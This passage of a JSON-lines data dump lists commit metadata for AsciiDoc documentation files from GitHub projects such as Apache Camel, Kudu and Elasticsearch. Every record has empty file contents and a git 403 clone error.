boukhed\/camel,zregvart\/camel,pax95\/camel,jonmcewen\/camel,dmvolod\/camel,DariusX\/camel,curso007\/camel,adessaigne\/camel,dmvolod\/camel,pmoerenhout\/camel,drsquidop\/camel,akhettar\/camel,yuruki\/camel,ullgren\/camel,mcollovati\/camel,anton-k11\/camel,cunningt\/camel,drsquidop\/camel,mcollovati\/camel,davidkarlsen\/camel,curso007\/camel,jonmcewen\/camel,tadayosi\/camel,Fabryprog\/camel,rmarting\/camel,scranton\/camel,drsquidop\/camel,tadayosi\/camel,apache\/camel,Fabryprog\/camel,apache\/camel,mcollovati\/camel,davidkarlsen\/camel,gnodet\/camel,nicolaferraro\/camel,christophd\/camel,Thopap\/camel,gnodet\/camel,mgyongyosi\/camel,anoordover\/camel,pmoerenhout\/camel,anoordover\/camel,kevinearls\/camel,mgyongyosi\/camel,rmarting\/camel,tadayosi\/camel,gnodet\/camel,tdiesler\/camel,salikjan\/camel,yuruki\/camel,punkhorn\/camel-upstream,curso007\/camel,sverkera\/camel,zregvart\/camel,jonmcewen\/camel,objectiser\/camel,salikjan\/camel,akhettar\/camel,anton-k11\/camel,mcollovati\/camel,onders86\/camel,gnodet\/camel,nicolaferraro\/camel,CodeSmell\/camel,akhettar\/camel,jamesnetherton\/camel,christophd\/camel,cunningt\/camel,rmarting\/camel,jamesnetherton\/camel,anton-k11\/camel,tlehoux\/camel,akhettar\/camel,dmvolod\/camel,nb
oukhed\/camel,acartapanis\/camel,akhettar\/camel,Fabryprog\/camel,snurmine\/camel,nikhilvibhav\/camel,gautric\/camel,cunningt\/camel,punkhorn\/camel-upstream,pax95\/camel,pax95\/camel,isavin\/camel,anton-k11\/camel,ullgren\/camel,mgyongyosi\/camel,gnodet\/camel,yuruki\/camel,Thopap\/camel,onders86\/camel,prashant2402\/camel,dmvolod\/camel,punkhorn\/camel-upstream,onders86\/camel,Thopap\/camel,snurmine\/camel,adessaigne\/camel,kevinearls\/camel,drsquidop\/camel,CodeSmell\/camel,nikhilvibhav\/camel,adessaigne\/camel,sverkera\/camel,jamesnetherton\/camel,apache\/camel,pkletsko\/camel,sverkera\/camel,ullgren\/camel","old_file":"components\/camel-hystrix\/src\/main\/docs\/hystrix.adoc","new_file":"components\/camel-hystrix\/src\/main\/docs\/hystrix.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pax95\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"77c69bb6213b91dc25039518ca08a4e1872515d2","subject":"Added docs for file repos","message":"Added docs for file repos\n","repos":"woq-blended\/blended,lefou\/blended,woq-blended\/blended,lefou\/blended","old_file":"doc\/FileRepository.adoc","new_file":"doc\/FileRepository.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lefou\/blended.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"76ec7e66e9227542a3986799599bd04bc7b51fb9","subject":"WIP: Adding some missing 0.10.0 release notes","message":"WIP: Adding some missing 0.10.0 release notes\n\nThis isn't complete and is missing some information, but it should\ngive us a head start. Several TODOs need to be addressed before\nthis is complete.\n\nChange-Id: Ibdc9fd57b05434874845ffa9c0ff905b5b8d0422\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/3802\nReviewed-by: Misty Stanley-Jones <b9f9ef9e00c258208ea831c64cc129eda4ac78b4@apache.org>\nTested-by: Todd Lipcon <2c763d726a8c2f6afda9be7e0e56a2caa6bb5e6b@apache.org>\n","repos":"helifu\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,cloudera\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,helifu\/kudu,InspurUSA\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,cloudera\/kudu,cloudera\/kudu,cloudera\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,andrwng\/kudu,helifu\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,andrwng\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,andrwng\/kudu,InspurUSA\/kudu,cloudera\/kudu,helifu\/kudu,cloudera\/kudu,helifu\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu","old_file":"docs\/release_notes.adoc","new_file":"docs\/release_notes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"9e0289a22b73665e746b415b77fef8a3982399af","subject":"Update 2016-05-16-On-the-road-again-Scala-days-Berlin-2016.adoc","message":"Update 
2016-05-16-On-the-road-again-Scala-days-Berlin-2016.adoc","repos":"pepite\/hubpress.io,pepite\/hubpress.io,pepite\/hubpress.io,pepite\/hubpress.io","old_file":"_posts\/2016-05-16-On-the-road-again-Scala-days-Berlin-2016.adoc","new_file":"_posts\/2016-05-16-On-the-road-again-Scala-days-Berlin-2016.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pepite\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ebe64c3eaa42cb0de51e00906b8721b30d02931a","subject":"y2b create post How To Try Secret Smartphones Before They Launch...","message":"y2b create post How To Try Secret Smartphones Before They Launch...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-04-06-How-To-Try-Secret-Smartphones-Before-They-Launch.adoc","new_file":"_posts\/2017-04-06-How-To-Try-Secret-Smartphones-Before-They-Launch.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"988980c8d785e020fa11ccc1730a5076c5e0f59a","subject":"Update 2019-01-31-How-to-modify-smbios-information-on-container-co.adoc","message":"Update 2019-01-31-How-to-modify-smbios-information-on-container-co.adoc","repos":"nnn-dev\/nnn-dev.github.io,nnn-dev\/nnn-dev.github.io,nnn-dev\/nnn-dev.github.io,nnn-dev\/nnn-dev.github.io","old_file":"_posts\/2019-01-31-How-to-modify-smbios-information-on-container-co.adoc","new_file":"_posts\/2019-01-31-How-to-modify-smbios-information-on-container-co.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nnn-dev\/nnn-dev.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"505208a0d57f89291af2bfbc828a2107160c6b16","subject":"y2b create post 7TB Storage For The Mac Pro (Mediasonic Pro Box Unboxing + Setup)","message":"y2b create post 7TB Storage For The Mac Pro (Mediasonic Pro Box Unboxing + Setup)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2014-02-26-7TB-Storage-For-The-Mac-Pro-Mediasonic-Pro-Box-Unboxing--Setup.adoc","new_file":"_posts\/2014-02-26-7TB-Storage-For-The-Mac-Pro-Mediasonic-Pro-Box-Unboxing--Setup.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3052f6499ee0299bee7a40287145b6ce0fab113d","subject":"Add AM installation guide","message":"Add AM installation guide\n","repos":"gravitee-io\/gravitee-docs,gravitee-io\/gravitee-docs,gravitee-io\/gravitee-docs","old_file":"pages\/am\/installation-guide\/installation-guide.adoc","new_file":"pages\/am\/installation-guide\/installation-guide.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gravitee-io\/gravitee-docs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"d61dce08148162425e651b8a8037df60f970cf07","subject":"sf clojurebridge 09\/16\/17 event","message":"sf clojurebridge 09\/16\/17 
event\n","repos":"clojure\/clojure-site","old_file":"content\/events\/2017\/clojurebridge-sanfrancisco.adoc","new_file":"content\/events\/2017\/clojurebridge-sanfrancisco.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"df8f82f6732293dcdf3c1dc60c4263f20ea80498","subject":"richa's instructions.","message":"richa's instructions.\n","repos":"CityOfNewYork\/NYCOpenRecords,CityOfNewYork\/NYCOpenRecords,CityOfNewYork\/NYCOpenRecords,CityOfNewYork\/NYCOpenRecords,CityOfNewYork\/NYCOpenRecords","old_file":"docs\/redeploy.adoc","new_file":"docs\/redeploy.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/CityOfNewYork\/NYCOpenRecords.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"9a6370bba18b657534c45733dc1f46d13c3aa6f5","subject":"Update 2015-07-13-Work-in-progress-bash-script-to-install-Future-Pinball-on-Ubuntu.adoc","message":"Update 2015-07-13-Work-in-progress-bash-script-to-install-Future-Pinball-on-Ubuntu.adoc","repos":"Ugotsta\/Ugotsta.github.io,Ugotsta\/Ugotsta.github.io,Ugotsta\/Ugotsta.github.io,Ugotsta\/Ugotsta.github.io","old_file":"_posts\/2015-07-13-Work-in-progress-bash-script-to-install-Future-Pinball-on-Ubuntu.adoc","new_file":"_posts\/2015-07-13-Work-in-progress-bash-script-to-install-Future-Pinball-on-Ubuntu.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Ugotsta\/Ugotsta.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f86550d0e92e1b1f84512592dc4a93d66049352a","subject":"y2b create post The Triple Monitor Mega MacBook!","message":"y2b create post The Triple Monitor Mega MacBook!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-07-29-The-Triple-Monitor-Mega-MacBook.adoc","new_file":"_posts\/2016-07-29-The-Triple-Monitor-Mega-MacBook.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e4c0852c53aad62b074b3e6792e421723ca3535a","subject":"polish readme","message":"polish readme\n","repos":"axibase\/spring-boot,axibase\/spring-boot,axibase\/spring-boot,axibase\/spring-boot,axibase\/spring-boot","old_file":"spring-boot-samples\/spring-boot-sample-metrics-atsd\/README.adoc","new_file":"spring-boot-samples\/spring-boot-sample-metrics-atsd\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/axibase\/spring-boot.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"b634752b761425576c0868284301e45d3bf8a2e7","subject":"[DOC] Add WAN configuration option relates #577","message":"[DOC] Add WAN configuration option\nrelates 
#577\n","repos":"xjrk58\/elasticsearch-hadoop,takezoe\/elasticsearch-hadoop,costin\/elasticsearch-hadoop,elastic\/elasticsearch-hadoop,girirajsharma\/elasticsearch-hadoop,elastic\/elasticsearch-hadoop","old_file":"docs\/src\/reference\/asciidoc\/core\/configuration.adoc","new_file":"docs\/src\/reference\/asciidoc\/core\/configuration.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xjrk58\/elasticsearch-hadoop.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"d0d8c94b07328b3929c6184c4bd2ac21b37e04a8","subject":"Change configuration order","message":"Change configuration order\n\nHave swapped the config order of \"es.ser.writer.value.class\" & \"es.ser.reader.value.class\" to match the correct description.\n","repos":"pranavraman\/elasticsearch-hadoop,lgscofield\/elasticsearch-hadoop,xjrk58\/elasticsearch-hadoop,cgvarela\/elasticsearch-hadoop,elastic\/elasticsearch-hadoop,costin\/elasticsearch-hadoop,takezoe\/elasticsearch-hadoop,girirajsharma\/elasticsearch-hadoop,yonglehou\/elasticsearch-hadoop,elastic\/elasticsearch-hadoop","old_file":"docs\/src\/reference\/asciidoc\/core\/configuration.adoc","new_file":"docs\/src\/reference\/asciidoc\/core\/configuration.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xjrk58\/elasticsearch-hadoop.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"b1693934b3a3401c2b72fe266b9db10e9b26b562","subject":"Update 2017-09-18-Syntactically-correct-and-type-safe-JPA-queries-in-Play-20.adoc","message":"Update 2017-09-18-Syntactically-correct-and-type-safe-JPA-queries-in-Play-20.adoc","repos":"pepite\/hubpress.io,pepite\/hubpress.io,pepite\/hubpress.io,pepite\/hubpress.io","old_file":"_posts\/2017-09-18-Syntactically-correct-and-type-safe-JPA-queries-in-Play-20.adoc","new_file":"_posts\/2017-09-18-Syntactically-correct-and-type-safe-JPA-queries-in-Play-20.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pepite\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e20484cb73d954b125c6d9b983ea21c65f7adbb4","subject":"Create dummy Release Notes for 4.9 on main","message":"Create dummy Release Notes for 4.9 on main\n","repos":"vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs","old_file":"release_notes\/ocp-4-9-release-notes.adoc","new_file":"release_notes\/ocp-4-9-release-notes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/vikram-redhat\/openshift-docs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"f0f8fb6e5f97bb1a5d9f5ee98610e71eb960fa91","subject":"SQL: Fix doc pointer to SQL's tests","message":"SQL: Fix doc pointer to SQL's tests\n\nThe docs include portions of the SQL tests and for that to work they\nneed to point to position of the tests. They use a relative directory\nbut relative to *what*? That turns out to be a fairly complex thing to\nanswer, luckilly, `index.x.asciidoc` defines `xes-repo-dir` which points\nto the root of the xpack docs. 
We can use that to find the sql tests\nwithout having to answer the \"relative to what?\" question in two places.\n\nOriginal commit: elastic\/x-pack-elasticsearch@ebea586fdf7bed7663c27193e3a304ab768598c8\n","repos":"GlenRSmith\/elasticsearch,coding0011\/elasticsearch,robin13\/elasticsearch,gfyoung\/elasticsearch,uschindler\/elasticsearch,GlenRSmith\/elasticsearch,gingerwizard\/elasticsearch,uschindler\/elasticsearch,coding0011\/elasticsearch,HonzaKral\/elasticsearch,nknize\/elasticsearch,HonzaKral\/elasticsearch,scorpionvicky\/elasticsearch,coding0011\/elasticsearch,robin13\/elasticsearch,gingerwizard\/elasticsearch,nknize\/elasticsearch,scorpionvicky\/elasticsearch,gingerwizard\/elasticsearch,gingerwizard\/elasticsearch,scorpionvicky\/elasticsearch,gingerwizard\/elasticsearch,gfyoung\/elasticsearch,GlenRSmith\/elasticsearch,HonzaKral\/elasticsearch,nknize\/elasticsearch,robin13\/elasticsearch,GlenRSmith\/elasticsearch,uschindler\/elasticsearch,nknize\/elasticsearch,gfyoung\/elasticsearch,HonzaKral\/elasticsearch,uschindler\/elasticsearch,coding0011\/elasticsearch,robin13\/elasticsearch,gingerwizard\/elasticsearch,scorpionvicky\/elasticsearch,gfyoung\/elasticsearch,nknize\/elasticsearch,scorpionvicky\/elasticsearch,uschindler\/elasticsearch,gfyoung\/elasticsearch,GlenRSmith\/elasticsearch,coding0011\/elasticsearch,robin13\/elasticsearch,gingerwizard\/elasticsearch","old_file":"docs\/en\/sql\/index.asciidoc","new_file":"docs\/en\/sql\/index.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scorpionvicky\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"fff9d913df824c3c2916190091363c4016e35e8e","subject":"CAMEL-14545: Add doc about camel-catalog","message":"CAMEL-14545: Add doc about camel-catalog\n","repos":"christophd\/camel,christophd\/camel,adessaigne\/camel,tdiesler\/camel,tdiesler\/camel,nicolaferraro\/camel,pmoerenhout\/camel,pmoerenhout\/camel,christophd\/camel,pax95\/camel,nikhilvibhav\/camel,christophd\/camel,adessaigne\/camel,mcollovati\/camel,apache\/camel,mcollovati\/camel,apache\/camel,ullgren\/camel,tadayosi\/camel,pmoerenhout\/camel,zregvart\/camel,nikhilvibhav\/camel,mcollovati\/camel,tadayosi\/camel,cunningt\/camel,apache\/camel,cunningt\/camel,tdiesler\/camel,zregvart\/camel,nicolaferraro\/camel,pmoerenhout\/camel,DariusX\/camel,gnodet\/camel,adessaigne\/camel,christophd\/camel,pax95\/camel,apache\/camel,pmoerenhout\/camel,cunningt\/camel,apache\/camel,tdiesler\/camel,pax95\/camel,cunningt\/camel,DariusX\/camel,christophd\/camel,tadayosi\/camel,ullgren\/camel,zregvart\/camel,mcollovati\/camel,pax95\/camel,ullgren\/camel,tadayosi\/camel,cunningt\/camel,nicolaferraro\/camel,gnodet\/camel,DariusX\/camel,tdiesler\/camel,nicolaferraro\/camel,nikhilvibhav\/camel,tdiesler\/camel,adessaigne\/camel,alvinkwekel\/camel,ullgren\/camel,DariusX\/camel,pax95\/camel,zregvart\/camel,pmoerenhout\/camel,adessaigne\/camel,tadayosi\/camel,tadayosi\/camel,gnodet\/camel,pax95\/camel,alvinkwekel\/camel,gnodet\/camel,alvinkwekel\/camel,apache\/camel,adessaigne\/camel,cunningt\/camel,gnodet\/camel,nikhilvibhav\/camel,alvinkwekel\/camel","old_file":"docs\/user-manual\/modules\/ROOT\/pages\/camel-catalog.adoc","new_file":"docs\/user-manual\/modules\/ROOT\/pages\/camel-catalog.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/adessaigne\/camel.git\/': The requested URL returned error: 
403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"baeec76f78e1a2eb88759d709040b5a59f07f317","subject":"Update 2016-01-23-Not-your-Fathers-XQuery.adoc","message":"Update 2016-01-23-Not-your-Fathers-XQuery.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2016-01-23-Not-your-Fathers-XQuery.adoc","new_file":"_posts\/2016-01-23-Not-your-Fathers-XQuery.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ae3a089dcaf9e6e8106d4b44937902a9929439c0","subject":"Update 2016-09-innovation-engineer-aruaru.adoc","message":"Update 2016-09-innovation-engineer-aruaru.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-09-innovation-engineer-aruaru.adoc","new_file":"_posts\/2016-09-innovation-engineer-aruaru.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e7dc16befe42d578a3bdda7eb3ba62d0053e3242","subject":"Update 2017-12-23-Website-update.adoc","message":"Update 2017-12-23-Website-update.adoc","repos":"scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io","old_file":"_posts\/2017-12-23-Website-update.adoc","new_file":"_posts\/2017-12-23-Website-update.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scriptindex\/scriptindex.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3a87309a038925151217304689c880b69810e457","subject":"Intro & ex JAXB","message":"Intro & ex JAXB\n","repos":"oliviercailloux\/jee,oliviercailloux\/java-course,oliviercailloux\/java-course","old_file":"JAXB.adoc","new_file":"JAXB.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/java-course.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1dc0bf2d0b67d064dde3f58ceacdd0ba1f65901e","subject":"iterm: Add a `prerequisites` section to the readme","message":"iterm: Add a `prerequisites` section to the readme\n\nThe prerequisites are simple: in order to be able to use the iTerm2\nconfiguration, you have to install iTerm2.\n\nI recommend installing the nightly version, because it contains features\nthat I am going to make use of in the future.\n","repos":"PigeonF\/.dotfiles","old_file":"iterm2\/README.adoc","new_file":"iterm2\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/PigeonF\/.dotfiles.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6af2e551d6929405cf567d84abfe3009de606cd7","subject":"Update 2016-07-15-The-first-post.adoc","message":"Update 
2016-07-15-The-first-post.adoc","repos":"rynop\/rynop.hubpress.io,rynop\/rynop.hubpress.io,rynop\/rynop.hubpress.io,rynop\/rynop.hubpress.io","old_file":"_posts\/2016-07-15-The-first-post.adoc","new_file":"_posts\/2016-07-15-The-first-post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rynop\/rynop.hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b47032527e085ef2095cb130ac7de31f1ff77b31","subject":"Update 2017-01-20-Swift-Web-View.adoc","message":"Update 2017-01-20-Swift-Web-View.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-01-20-Swift-Web-View.adoc","new_file":"_posts\/2017-01-20-Swift-Web-View.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0b2a3372e703ca6eef5b14b98ba3718cbfdd418d","subject":"Update 2015-12-21-Flask-Template.adoc","message":"Update 2015-12-21-Flask-Template.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2015-12-21-Flask-Template.adoc","new_file":"_posts\/2015-12-21-Flask-Template.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1702be81d3245a8295b07ca068a06349d18c891c","subject":"Create using-ses-with-aws.adoc","message":"Create using-ses-with-aws.adoc\n\nIn progress","repos":"killbill\/killbill-docs,killbill\/killbill-docs","old_file":"userguide\/tutorials\/using-ses-with-aws.adoc","new_file":"userguide\/tutorials\/using-ses-with-aws.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/killbill\/killbill-docs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"f83ec1639ededeefd4c6dd7a6292ab198bd3429b","subject":"Update 2015-06-18-Mein-freiwilliges-politisches-Jahr-Teil-1.adoc","message":"Update 2015-06-18-Mein-freiwilliges-politisches-Jahr-Teil-1.adoc","repos":"hoernschen\/hoernschen.github.io,hoernschen\/hoernschen.github.io,hoernschen\/hoernschen.github.io,hoernschen\/hoernschen.github.io","old_file":"_posts\/2015-06-18-Mein-freiwilliges-politisches-Jahr-Teil-1.adoc","new_file":"_posts\/2015-06-18-Mein-freiwilliges-politisches-Jahr-Teil-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hoernschen\/hoernschen.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5540df765187fc68c65e6f667bc594cfeab483cf","subject":"Update 2016-07-01-MIXED-REALITY-Emerging-Trend-in-Computing.adoc","message":"Update 2016-07-01-MIXED-REALITY-Emerging-Trend-in-Computing.adoc","repos":"anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog","old_file":"_posts\/2016-07-01-MIXED-REALITY-Emerging-Trend-in-Computing.adoc","new_file":"_posts\/2016-07-01-MIXED-REALITY-Emerging-Trend-in-Computing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 
'https:\/\/github.com\/anandjagadeesh\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e4fad8c0b36e91d938b5ef77ccb147e2344b375b","subject":"Update 2017-07-09-Serverless-Framework-E-C-M-A-Script2015-1.adoc","message":"Update 2017-07-09-Serverless-Framework-E-C-M-A-Script2015-1.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-07-09-Serverless-Framework-E-C-M-A-Script2015-1.adoc","new_file":"_posts\/2017-07-09-Serverless-Framework-E-C-M-A-Script2015-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2036e370e298b1f5767c3a4e2896fa7b5b6f9e41","subject":"y2b create post Using Your Wrist To Power Your Smartphone...","message":"y2b create post Using Your Wrist To Power Your Smartphone...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2018-01-20-Using-Your-Wrist-To-Power-Your-Smartphone.adoc","new_file":"_posts\/2018-01-20-Using-Your-Wrist-To-Power-Your-Smartphone.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"97808f4679d103cc57004b154dd3d2f622db3119","subject":"Publish 2100-1-1-Puzzle-1-Please-call-my-A-P-Is.adoc","message":"Publish 2100-1-1-Puzzle-1-Please-call-my-A-P-Is.adoc","repos":"puzzles-engineer\/puzzles-engineer.github.io,puzzles-engineer\/puzzles-engineer.github.io,puzzles-engineer\/puzzles-engineer.github.io,puzzles-engineer\/puzzles-engineer.github.io","old_file":"2100-1-1-Puzzle-1-Please-call-my-A-P-Is.adoc","new_file":"2100-1-1-Puzzle-1-Please-call-my-A-P-Is.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/puzzles-engineer\/puzzles-engineer.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3e2b777cc9e047efb9e1baaa6f21ffca944c185a","subject":"Update 2017-02-28-Eclipse-Unable-to-acquire-the-state-change-lock-for-the-module.adoc","message":"Update 2017-02-28-Eclipse-Unable-to-acquire-the-state-change-lock-for-the-module.adoc","repos":"jsiu22\/blog,jsiu22\/blog,jsiu22\/blog,jsiu22\/blog","old_file":"_posts\/2017-02-28-Eclipse-Unable-to-acquire-the-state-change-lock-for-the-module.adoc","new_file":"_posts\/2017-02-28-Eclipse-Unable-to-acquire-the-state-change-lock-for-the-module.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jsiu22\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f6e1bd95ea730772d83494c03907feea8b68a454","subject":"Create README-es.adoc","message":"Create README-es.adoc","repos":"MCPH\/minecrafterph.github.io,MCPH\/minecrafterph.github.io,MCPH\/minecrafterph.github.io","old_file":"README-es.adoc","new_file":"README-es.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/MCPH\/minecrafterph.github.io.git\/': The requested URL returned error: 
